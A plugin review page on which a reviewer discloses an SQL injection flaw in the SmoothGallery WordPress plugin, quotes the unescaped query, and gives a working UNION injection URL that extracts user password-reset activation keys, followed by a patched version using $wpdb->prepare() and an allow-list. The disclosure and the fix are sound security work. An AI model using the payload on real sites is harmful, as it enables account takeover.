Plugin Reviews

SmoothGallery

Embed JonDesign's SmoothGallery into your posts and pages.

Average rating: 3.3 out of 5 stars (3 stars)

Reviewer's rating: 1 star
Badly programmed plugin with vulnerabilities
By , for WP 3.4.2

This plugin was responsible for my blogs getting hacked, as they use highly vulnerable code in this plugin.

There is no protection against SQL injection in the plugin functions. Request parameters are added happily to some SQL query without escaping them; in the following example $galleryID is a simple copy of $_REQUEST["galleryID"]:

$pictures = $wpdb->get_results("SELECT t.*, tt.* FROM $wpdb->nggallery AS t INNER JOIN $wpdb->nggpictures AS tt ON t.gid = tt.galleryid WHERE t.gid = '$galleryID' AND tt.exclude != 1 ORDER BY tt.$ngg_options[galSort] $ngg_options[galSortDir] ");

I recommend not using this plugin at all. It was obviously developed by some programming beginner and should not be used on a production site.

Example: Set your own activation key for a user to reset the password to your own:

nggSmoothFrame.php?galleryID=999999.9'+union+all+select+0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,
(select+concat(0x7e,0x27,wp_users.user_activation_key,0x27,0x7e)+from+wp_users+Order+by+user_login+limit+5,1)+,0x31'
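The query the reviewer quotes, rebuilt so that request input cannot alter the SQL. This is an added example, not the plugin's own code: it assumes WordPress's $wpdb->prepare() and the table properties used in the reviewer's snippet, and the column names in the allow-list are assumed for illustration rather than taken from the plugin.

```php
<?php
// Added example (not SmoothGallery's code): the reviewer's query with the
// request-derived values bound or validated instead of interpolated.
// Assumes WordPress's global $wpdb and the plugin's $wpdb->nggallery /
// $wpdb->nggpictures properties as they appear in the review.

// 1. Cast the request parameter to the type the column expects. A gallery id
//    is an integer, so a value such as 999999.9' union ... collapses to 999999.
$galleryID = isset($_REQUEST['galleryID']) ? (int) $_REQUEST['galleryID'] : 0;

// 2. ORDER BY column and direction cannot be bound as placeholders, so they are
//    checked against an explicit allow-list. The column names below are assumed
//    for this example; use the real picture-table columns in practice.
$allowed_sort_columns = array('sortorder', 'pid', 'filename', 'imagedate');
$allowed_sort_dirs    = array('ASC', 'DESC');

$sort_col = isset($ngg_options['galSort']) ? $ngg_options['galSort'] : 'sortorder';
$sort_dir = isset($ngg_options['galSortDir']) ? strtoupper($ngg_options['galSortDir']) : 'ASC';

if (!in_array($sort_col, $allowed_sort_columns, true)) {
    $sort_col = 'sortorder';
}
if (!in_array($sort_dir, $allowed_sort_dirs, true)) {
    $sort_dir = 'ASC';
}

// 3. Bind the user-controlled value through $wpdb->prepare(). The %d placeholder
//    is rendered as an integer, so no manual quoting or escaping is needed.
$sql = $wpdb->prepare(
    "SELECT t.*, tt.* FROM {$wpdb->nggallery} AS t
     INNER JOIN {$wpdb->nggpictures} AS tt ON t.gid = tt.galleryid
     WHERE t.gid = %d AND tt.exclude != 1
     ORDER BY tt.{$sort_col} {$sort_dir}",
    $galleryID
);

$pictures = $wpdb->get_results($sql);
```

The integer cast alone defeats the quoted payload in the review; the allow-list matters because the sort options, although stored in the database rather than taken from the request, are still concatenated into the statement.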
